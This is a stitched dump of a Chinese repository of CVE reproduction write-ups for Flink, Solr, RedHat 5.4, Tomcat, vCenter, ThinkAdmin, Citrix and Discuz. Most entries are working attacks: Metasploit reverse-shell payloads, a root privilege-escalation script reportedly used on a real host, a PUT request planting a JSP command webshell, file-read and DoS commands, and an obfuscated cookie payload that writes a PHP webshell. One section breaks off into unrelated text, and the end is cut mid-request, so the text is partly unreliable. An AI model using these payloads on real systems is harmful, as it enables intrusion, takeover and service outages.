-------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:本地搭建的环境 3 | 复现版本:Flink 1.9.1 4 | 5 | # 0x01 环境搭建 6 | 目标环境:centos7_x64_en-us + flink-1.9.1-bin-scala_2.11.tgz + openjdk version "1.8.0_181" 7 | 8 | wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz 9 | tar -xvf ./flink-1.9.1-bin-scala_2.11.tgz 10 | cd ./flink-1.9.1/bin/ 11 | ./start-cluster.sh 12 | 查看端口8081是否开启,如下图 13 | ![image](./0.png) 14 | 浏览器访问,出现下图所示,表示成功启动 15 | ![image](./1.png) 16 | 17 | # 0x02 利用条件 18 | 无 19 | 20 | # 0x03 影响版本 21 | Flink <= 1.9.1 22 | 23 | # 0x04 漏洞复现 24 | 攻击环境:kali2020 + msf5 25 | 26 | msfvenom -p java/meterpreter/reverse_tcp lhost=172.16.35.128 lport=9999 -o text.jar 27 | msfconsole 28 | use exploit/multi/handler 29 | set payload java/meterpreter/reverse_tcp 30 | set lhost 172.16.35.128 31 | set lport 9999 32 | run 33 | 浏览器访问http://172.16.35.131:8081/ 后点击下图所示 34 | ![image](./2.png) 35 | 再点击下图所示 36 | ![image](./3.png) 37 | 此时,meterpreter已经收到session,如下图 38 | ![image](./4.png) 39 | 40 | # 0x05 踩坑记录 41 | 无 42 | 43 | # 0x06 参考链接 44 | 无 45 | -------------------------------------------------------------------------------- /2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/1.png -------------------------------------------------------------------------------- /2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/2.png -------------------------------------------------------------------------------- /2020_10_09_Apache Solr远程代码执行漏洞复现(CVE-2019-12409)/readme.md: 
-------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:本地搭建的环境 3 | 复现版本:Solr 8.2.0 4 | 5 | # 0x01 环境搭建 6 | 目标环境:centos7_x64_en-us + solr-8.2.0.tgz + openjdk version "1.8.0_181" 7 | wget https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz 8 | tar -xvf ./solr-8.2.0.tgz 9 | cd ./solr-8.2.0/bin/ 10 | ./solr start -force #默认启动端口8983 11 | 启动后浏览器访问http://127.0.0.1:8983/ ,出现下图所示表示环境配置完成: 12 | ![image](./1.png) 13 | 14 | # 0x02 利用条件 15 | 无 16 | 17 | # 0x03 影响版本 18 | Solr 8.1.1 19 | Solr 8.2.0 20 | 21 | # 0x04 漏洞复现 22 | 攻击环境:kali2020 + msf5 23 | msfconsole 24 | use exploit/multi/misc/java_jmx_server 25 | set rhosts 172.16.35.138 26 | set rport 18983 27 | run 28 | ![image](./2.png) 29 | 30 | # 0x05 踩坑记录 31 | 坑1: 32 | 在kali下搭建的漏洞环境run多次后一直失败,经查看发现kali下的java版本是openjdk version "11.0.6" 2020-01-14,怀疑可能是java版本过高导致的利用失败,故在ubuntu16.04_x64_en-us下使用java8重新搭建solr-8.2.0.zip,漏洞利用成功。看过别人在java10下也有利用成功的文章,怀疑可能exp针对java10及以下的版本才有效。 33 | 坑2: 34 | centos7下默认开启防火墙,需要临时关闭防火墙:“systemctl stop firewalld” 35 | 36 | # 0x06 参考链接 37 | https://github.com/jas502n/CVE-2019-12409 38 | -------------------------------------------------------------------------------- /2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/b1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/b1.png -------------------------------------------------------------------------------- /2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/cve-2010-3847.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo wait 3 | cat > a.c << _EOF 4 | void __attribute__((constructor)) init() 5 | { 6 | setuid(0); 7 | system("/bin/bash"); 8 | } 9 | _EOF 10 | mkdir /tmp/lenis 11 | ln /bin/ping /tmp/lenis/target 12 | exec 3< /tmp/lenis/target 13 | rm -rf /tmp/lenis/ 14 | gcc -w 
-fPIC -shared -o /tmp/lenis a.c 15 | rm -r a.c 16 | LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 -------------------------------------------------------------------------------- /2020_10_12_RedHat 5.4权限提升漏洞复现(CVE-2010-3847)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:实战中的环境 3 | 复现版本:Red Hat 5.4(linux 2.6.18-164.el5) 4 | 5 | # 0x01 环境搭建 6 | 无 7 | 8 | # 0x02 利用条件 9 | 无 10 | 11 | # 0x03 影响版本 12 | Red Hat Enterprise Linux Server release 5.4 (Tikanga) 13 | 14 | # 0x04 漏洞复现 15 | cat /etc/redhat-release 16 | Red Hat Enterprise Linux Server release 5.4 (Tikanga) 17 | uname -a 18 | Linux dongda97.dong-da.com 2.6.18-164.el5 #1 SMP Tue Aug 18 15:51:48 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux 19 | 20 | 直接执行脚本: 21 | bash ./cve-2010-3847.sh 22 | 执行后会在本地得到一个root权限的shell(脚本中只有setuid(0)和system("/bin/bash"),并不反弹到远程),如下图: 23 | ![image](./b1.png) 24 | 25 | # 0x05 踩坑记录 26 | 无 27 | 28 | # 0x06 参考链接 29 | 无 30 | -------------------------------------------------------------------------------- /2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f0.png -------------------------------------------------------------------------------- /2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/f1.png -------------------------------------------------------------------------------- /2020_10_13_Tomcat任意文件写入漏洞复现(CVE-2017-12615)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 复现环境 2 | 使用复现环境:https://www.mozhe.cn/bug/detail/120 3 | 复现版本:Tomcat 7.0.79 4 | 5 | # 0x01 环境搭建 6 | 无 7 | 8 | # 0x02 利用条件 9 | 
安装在Windows下 10 | 11 | # 0x03 影响版本 12 | 7.0.0 <= Tomcat <= 7.0.79 13 | 14 | # 0x04 漏洞复现 15 | 攻击环境:kali2020 16 | 17 | 访问目标地址,burp抓包,改包如下: 18 | ``` 19 | PUT /cmd.jsp// HTTP/1.1 20 | Host: 219.153.49.228:45174 21 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 23 | Accept-Language: en-US,en;q=0.5 24 | Accept-Encoding: gzip, deflate 25 | Connection: close 26 | Upgrade-Insecure-Requests: 1 27 | Pragma: no-cache 28 | Cache-Control: no-cache 29 | Content-Length: 313 30 | 31 | <% 32 | java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); 33 | int a = -1; 34 | byte[] b = new byte[2048]; 35 | out.print("
");
36 |         while((a=in.read(b))!=-1){
37 |             out.println(new String(b));
38 |         }
39 |         out.print("
"); 40 | %> 41 | ``` 42 | Send后,返回如下,返回“HTTP/1.1 201 Created”表示文件创建成功 43 | ![image](./f0.png) 44 | 访问如下URL:http://219.153.49.228:45174/cmd.jsp?cmd=cat%20/key.txt 后,返回执行命令后的结果 45 | ![image](./f1.png) 46 | 47 | # 0x05 踩坑记录 48 | 无 49 | 50 | # 0x06 参考链接 51 | 无 52 | -------------------------------------------------------------------------------- /2020_10_15_(未复现)VMware vCenter未验证的任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | POC: 2 | /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties 3 | 4 | 已知影响版本:VMware vCenter 6.5.0a-f 5 | 安全版本:VMware vCenter 6.5.0u1 6 | 7 | 有人提到:vCenter 5.5+Windows Server 2012下复现失败 8 | 9 | 参考链接: 10 | https://twitter.com/ptswarm/status/1316016337550938122 11 | -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/0.png -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/1.png -------------------------------------------------------------------------------- /2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/2.png -------------------------------------------------------------------------------- 
/2020_10_19_ThinkAdmin列目录和任意文件读取漏洞复现(CVE-2020-25540)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | 基于ThinkPHP,专注于微信领域后台管理的一款开发框架 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:2020.08.03.1之前的某一个v6版本:https://github.com/179776823/ThinkAdmin 7 | 8 | # 0x02 环境搭建 9 | 目标环境:2008_r2_standard_zh-chs + phpstudy + https://github.com/179776823/ThinkAdmin 10 | 11 | composer config -g repo.packagist composer https://mirrors.aliyun.com/composer #使用阿里云的源更快一些 12 | https://github.com/179776823/ThinkAdmin #下载有漏洞的v6版本到phpstudy的对应目录下 13 | cd ThinkAdmin 14 | composer install 15 | create database admin_v6; 16 | create user 'admin_v6'@'localhost' identified by 'FbYBHcWKr2';#用户名密码来自config\database.php 17 | grant all on admin_v6.* to 'admin_v6'@'localhost'; 18 | use admin_v6; 19 | source C:\phpstudy_pro\WWW\ThinkAdmin-6\admin_v6.sql;#将数据导入数据库 20 | 访问:http://127.0.0.1:81/ThinkAdmin-6/public/index.php 21 | 参考链接: 22 | https://mp.weixin.qq.com/s/MjU6u_eTsdH-nwQAgbxLRw 23 | https://thinkadmin.top/install 24 | https://www.cnblogs.com/Dot-Boy/archive/2008/08/04/1260185.html 25 | https://www.jianshu.com/p/d7b9c468f20d 26 | https://github.com/xuxuedong/personal-note/tree/master/2020_10_18_%E7%BD%91%E7%AB%99%E6%90%AD%E5%BB%BA%E4%BB%8E%E5%A4%B4%E8%AE%B0%E5%BD%95 27 | 28 | # 0x03 利用条件 29 | 无 30 | 31 | # 0x04 影响版本 32 | 漏洞发现者原话:2020.08.03.01,≤这个版本的都有可能存在漏洞 33 | 参考链接: 34 | https://github.com/zoujingli/ThinkAdmin/issues/244 35 | 36 | # 0x05 漏洞复现 37 | 攻击环境:Kali-Linux-2020.2-vmware-amd64 + Burp_Suite_Pro_v2020.5.1 38 | 39 | 列目录漏洞复现: 40 | 访问:http://192.168.149.133:81/ThinkAdmin-6/public/index.php/admin/login.html 41 | burp抓包,将数据包修改如下: 42 | ``` 43 | POST /ThinkAdmin-6/public/index.php/admin/login.html?s=admin/api.Update/node HTTP/1.1 44 | Host: 127.0.0.1 45 | Accept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) 46 | Connection: close 47 | Content-Type: 
application/x-www-form-urlencoded 48 | Content-Length: 22 49 | 50 | rules=%5B%22.%2F%22%5D 51 | ``` 52 | 成功列出了目录,如下图 53 | ![image](./0.png) 54 | 55 | 任意文件读取漏洞复现: 56 | 在网站根目录(C:\phpstudy_pro\WWW\ThinkAdmin-6\)下创建一个文件,名为1.txt,内容为:lalala 57 | 在攻击机的浏览器中访问:http://192.168.149.133:81/ThinkAdmin-6/public/index.php?s=admin/api.Update/get/encode/1d1a383c38 58 | 其中“1d1a383c38”是“1.txt”经下列函数编码后得到的 59 | ``` 60 | 12 |      13 |         

14 |          18 |      19 | 20 | ``` 21 | 手机和电脑处于同一局域网,微信客户端访问上述网页地址,成功获取到User-Agent,如下图 22 | ![image](./2.png) 23 | User-Agent如下 24 | ``` 25 | Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.12(0x17000c27) NetType/WIFI Language/zh_CN 26 | ``` 27 | 可留做以后使用 28 | 29 | # 0x02 为chrome浏览器配置User-Agent 30 | chrome下按F12(或ctrl+shift+i)打开开发者工具,按customize and control devtools即下图中红色圈出来的部分(或ctrl+shift+p)打开命令搜索框 31 | ![image](./3.png) 32 | 输入network conditions,并选择,如下图 33 | ![image](./4.png) 34 | 取消勾选automatically,并在User Agent处填入“micromessenger”,不要关闭开发者工具,否则所做的更改会失效,再次访问被微信限制的页面,能够成功访问页面 35 | 36 | # 0x03 注意 37 | 如果你要打开的网址是以 https://open.weixin.qq.com/ 开头的,那么它使用的是微信开放平台,需要使用你的微信帐户信息。这种方式不适用。 38 | -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/WebSocketClient.js: -------------------------------------------------------------------------------- 1 | class WebSocketClient { 2 | 3 | constructor(protocol, hostname, port, endpoint) { 4 | 5 | this.webSocket = null; 6 | 7 | this.protocol = protocol; 8 | this.hostname = hostname; 9 | this.port = port; 10 | this.endpoint = endpoint; 11 | } 12 | 13 | getServerUrl() { 14 | return this.protocol + "://" + this.hostname + ":" + this.port + this.endpoint; 15 | } 16 | 17 | connect() { 18 | try { 19 | this.webSocket = new WebSocket(this.getServerUrl()); 20 | 21 | // 22 | // Implement WebSocket event handlers! 
23 | // 24 | this.webSocket.onopen = function(event) { 25 | console.log('onopen::' + JSON.stringify(event, null, 4)); 26 | } 27 | 28 | this.webSocket.onmessage = function(event) { 29 | var msg = event.data; 30 | console.log('onmessage::' + JSON.stringify(msg, null, 4)); 31 | } 32 | this.webSocket.onclose = function(event) { 33 | console.log('onclose::' + JSON.stringify(event, null, 4)); 34 | } 35 | this.webSocket.onerror = function(event) { 36 | console.log('onerror::' + JSON.stringify(event, null, 4)); 37 | } 38 | 39 | } catch (exception) { 40 | console.error(exception); 41 | } 42 | } 43 | 44 | getStatus() { 45 | return this.webSocket.readyState; 46 | } 47 | 48 | send(message) { 49 | 50 | if (this.webSocket.readyState == WebSocket.OPEN) { 51 | this.webSocket.send(message); 52 | 53 | } else { 54 | console.error('webSocket is not open. readyState=' + this.webSocket.readyState); 55 | } 56 | } 57 | 58 | disconnect() { 59 | if (this.webSocket.readyState == WebSocket.OPEN) { 60 | this.webSocket.close(); 61 | 62 | } else { 63 | console.error('webSocket is not open. 
readyState=' + this.webSocket.readyState); 64 | } 65 | } 66 | } 67 | 68 | var client = new WebSocketClient('ws', '172.16.35.133', 8080, '/DemoOne/endpoint'); 69 | 70 | client.connect(); 71 | -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/WebSocketServlet.java: -------------------------------------------------------------------------------- 1 | package com.pegaxchange.java.web; 2 | 3 | import java.io.IOException; 4 | import java.util.List; 5 | import java.util.Map; 6 | 7 | import javax.websocket.OnClose; 8 | import javax.websocket.OnError; 9 | import javax.websocket.OnMessage; 10 | import javax.websocket.OnOpen; 11 | import javax.websocket.Session; 12 | import javax.websocket.server.ServerEndpoint; 13 | 14 | @ServerEndpoint("/endpoint") 15 | public class WebSocketServlet { 16 | 17 | @OnOpen 18 | public void onOpen(Session session) { 19 | System.out.println( "onOpen::" + session.getId() ); 20 | } 21 | 22 | @OnClose 23 | public void onClose(Session session) { 24 | System.out.println( "onClose::" + session.getId() ); 25 | } 26 | 27 | @OnMessage 28 | public void onMessage(String message, Session session) { 29 | System.out.println("onMessage::From=" + session.getId() + " Message=" + message); 30 | try { 31 | session.getBasicRemote().sendText("Hello Client " + session.getId() + "!"); 32 | } catch (IOException e) { 33 | e.printStackTrace(); 34 | } 35 | } 36 | 37 | @OnError 38 | public void onError(Throwable t) { 39 | System.out.println("onError::" + t.getMessage()); 40 | } 41 | } -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a.png 
-------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a0.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a1.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a2.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/a3.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/b.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/b.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 
拒绝服务漏洞复现(CVE-2020-13935)/c.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/c.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/d.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/e.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/e.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/f.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/f.png -------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Tomcat:一款流行的java web应用服务器 3 | 4 | # 0x01 复现环境 5 | 使用环境:本地搭建的环境 6 | 复现版本:apache-tomcat-8.5.56 7 | 8 | # 0x02 环境搭建 9 | 靶机系统:2008_r2_standard_zh-chs 10 | 11 | 下载并解压apache-tomcat-8.5.56 12 | 进入目录bin并执行startup.bat,出现“Server startup in xx ms”,通常表示启动成功,如下图 13 | ![image](./a.png) 14 | 访问[http://172.16.35.133:8080/](http://172.16.35.133:8080/),确认服务成功启动,如下图 15 | 
![image](./b.png) 16 | 接下来需要操作如下8个步骤: 17 | 1、JDK安装配置 18 | 2、Apache Tomcat安装配置 19 | 3、Eclipse IDE for Java EE安装配置 20 | 4、Tomcat运行时环境在Eclipse IDE for Java EE中配置 21 | 5、Eclipse中建立动态web项目 22 | 6、创建"Hello World" Servlet和JSP视图 23 | 7、在Eclipse中运行动态web项目 24 | 8、导出为WAR文件并部署到Tomcat中 25 | 写好的websocket应用见文件WebSocketServlet.java,部署好的websocket应用见下图 26 | ![image](./a0.png) 27 | 在火狐浏览器的开发者工具的控制台中依次执行WebSocketClient.js中的javascript代码,当执行完“client.connect();”,eclipse中tomcat控制台出现“onOpen::0”时,表示websocket应用部署成功,如下图 28 | ![image](./a1.png) 29 | 导出为DemoTwo.war并部署到tomcat中 30 | 31 | # 0x03 利用条件 32 | Tomcat上部署了WebSocket应用 33 | 34 | # 0x04 影响版本 35 | 9.0.0.M1 <= apache tomcat <= 9.0.36 36 | 10.0.0-M1 <= apache tomcat <= 10.0.0-M6 37 | 8.5.0 <= apache tomcat <= 8.5.56 38 | 7.0.27 <= apache tomcat <= 7.0.104 39 | 40 | # 0x05 漏洞复现 41 | 攻击系统:Kali-Linux-2020.2-vmware-amd64 42 | 43 | 复现针对自己编写的websocket应用: 44 | 执行如下命令: 45 | git clone https://github.com/RedTeamPentesting/CVE-2020-13935 46 | cd CVE-2020-13935 47 | go build 48 | ./tcdos ws://172.16.35.133:8080/DemoTwo/endpoint 49 | 执行后靶机系统CPU骤升到100%,如下图 50 | ![image](./a2.png) 51 | 此时,tomcat管理控制台显示如下 52 | ![image](./a3.png) 53 | 54 | 复现针对自带的websocket应用: 55 | 首先访问[http://172.16.35.133:8080/examples/websocket/](http://172.16.35.133:8080/examples/websocket/)确认存在WebSocket应用,如下图 56 | ![image](./f.png) 57 | 执行如下命令: 58 | ./tcdos ws://172.16.35.133:8080/examples/websocket/echoProgrammatic 59 | 执行后靶机系统CPU骤升到100%,如下图 60 | ![image](./c.png) 61 | 62 | # 0x06 踩坑记录 63 | 坑1: 64 | 执行go build后,可能会报如下错误 65 | ![image](./d.png) 66 | 此时需要一些合理上网方式,成功执行后如下图 67 | ![image](./e.png) 68 | 69 | # 0x07 参考链接 70 | https://www.anquanke.com/post/id/221861 71 | https://github.com/RedTeamPentesting/CVE-2020-13935 72 | https://www.pegaxchange.com/2018/01/28/websocket-server-java/ 73 | https://www.pegaxchange.com/2016/09/02/java-eclipse-tomcat/ 74 | https://www.cnblogs.com/xdp-gacl/p/5193279.html 75 | https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ 76 | 
-------------------------------------------------------------------------------- /2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/tcdos: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_10_Tomcat WebSocket 拒绝服务漏洞复现(CVE-2020-13935)/tcdos -------------------------------------------------------------------------------- /2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/0.png -------------------------------------------------------------------------------- /2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/CVE-2019-19781.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/CVE-2019-19781.zip -------------------------------------------------------------------------------- /2020_11_11_Citrix远程代码执行漏洞复现(CVE-2019-19781)/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Citrix:可以简单理解为从外网接入的公司的VPN设备,或网络出口的路由器设备等 3 | 4 | # 0x01 复现环境 5 | 使用环境:测试环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 无 10 | 11 | # 0x03 利用条件 12 | 无 13 | 14 | # 0x04 影响版本 15 | Citrix ADC and Citrix Gateway version 13.0 all supported builds before 13.0.47.24 16 | NetScaler ADC and NetScaler Gateway version 12.1 all supported builds before 12.1.55.18 17 | NetScaler ADC and NetScaler Gateway version 12.0 all supported builds before 12.0.63.13 18 | NetScaler ADC and NetScaler Gateway version 11.1 all supported builds before 11.1.63.15 19 | NetScaler ADC and NetScaler Gateway version 10.5 all supported builds before 10.5.70.12 20 | Citrix SD-WAN WANOP 
appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b 21 | 22 | # 0x05 漏洞复现 23 | 攻击环境:kali_x64_en-us 24 | 25 | git clone https://github.com/projectzeroindia/CVE-2019-19781 26 | cd ./CVE-2019-19781 27 | bash CVE-2019-19781.sh x.x.x.x 'ls' 28 | 如下图 29 | ![image](./0.png) 30 | 31 | # 0x06 踩坑记录 32 | 无 33 | 34 | # 0x07 参考链接 35 | 无 36 | -------------------------------------------------------------------------------- /2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/safesword/WebExp/1987e403734000d6346135fbd789ceb34b03ddde/2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行/0.png -------------------------------------------------------------------------------- /2020_11_11_Discuz 7.x 6.x 全局变量防御绕过导致远程代码执行/readme.md: -------------------------------------------------------------------------------- 1 | # 0x00 软件介绍 2 | Discuz:一款流行的论坛程序 3 | 4 | # 0x01 复现环境 5 | 使用环境:vulhub中的环境 6 | 复现版本:无 7 | 8 | # 0x02 环境搭建 9 | 靶机环境:2008_r2_standard_zh-chs 10 | 11 | 切换到对应目录下 12 | docker-compose up -d 13 | 启动后,访问[http://172.16.35.128:8080/install/](http://172.16.35.128:8080/install/)来安装discuz,数据库地址填写db,数据库名为discuz,数据库账号密码均为root 14 | 15 | # 0x03 利用条件 16 | 无 17 | 18 | # 0x04 影响版本 19 | Discuz 7.x 6.x 20 | 21 | # 0x05 漏洞复现 22 | 攻击环境:kali_x64_en-us 23 | 24 | 安装成功后,直接找一个已存在的帖子,向其发送数据包,将Cookie中的数据改为 25 | ``` 26 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 27 | ``` 28 | 请求如下 29 | ``` 30 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 31 | Host: 172.16.35.128:8080 32 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 33 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 34 | Accept-Language: en-US,en;q=0.5 35 | Accept-Encoding: gzip, deflate 36 | Referer: http://172.16.35.128:8080/forumdisplay.php?fid=2&page=1 37 | 
Connection: close 38 | Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo() 39 | Upgrade-Insecure-Requests: 1 40 | Pragma: no-cache 41 | Cache-Control: no-cache 42 | ``` 43 | 返回如下图 44 | ![image](./0.png) 45 | 46 | 想getshell可将Cookie中的内容变为 47 | ``` 48 | GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(119).Chr(102).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91).Chr(108).Chr(97).Chr(108).Chr(97).Chr(108).Chr(97).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59)) 49 | ``` 50 | 发送的请求如下 51 | ``` 52 | GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1 53 | Host: 172.16.35.128:8080 54 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 55 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 56 | Accept-Language: en-US,en;q=0.5 57 | Accept-Encoding: gzip, deflate 58 | Referer: 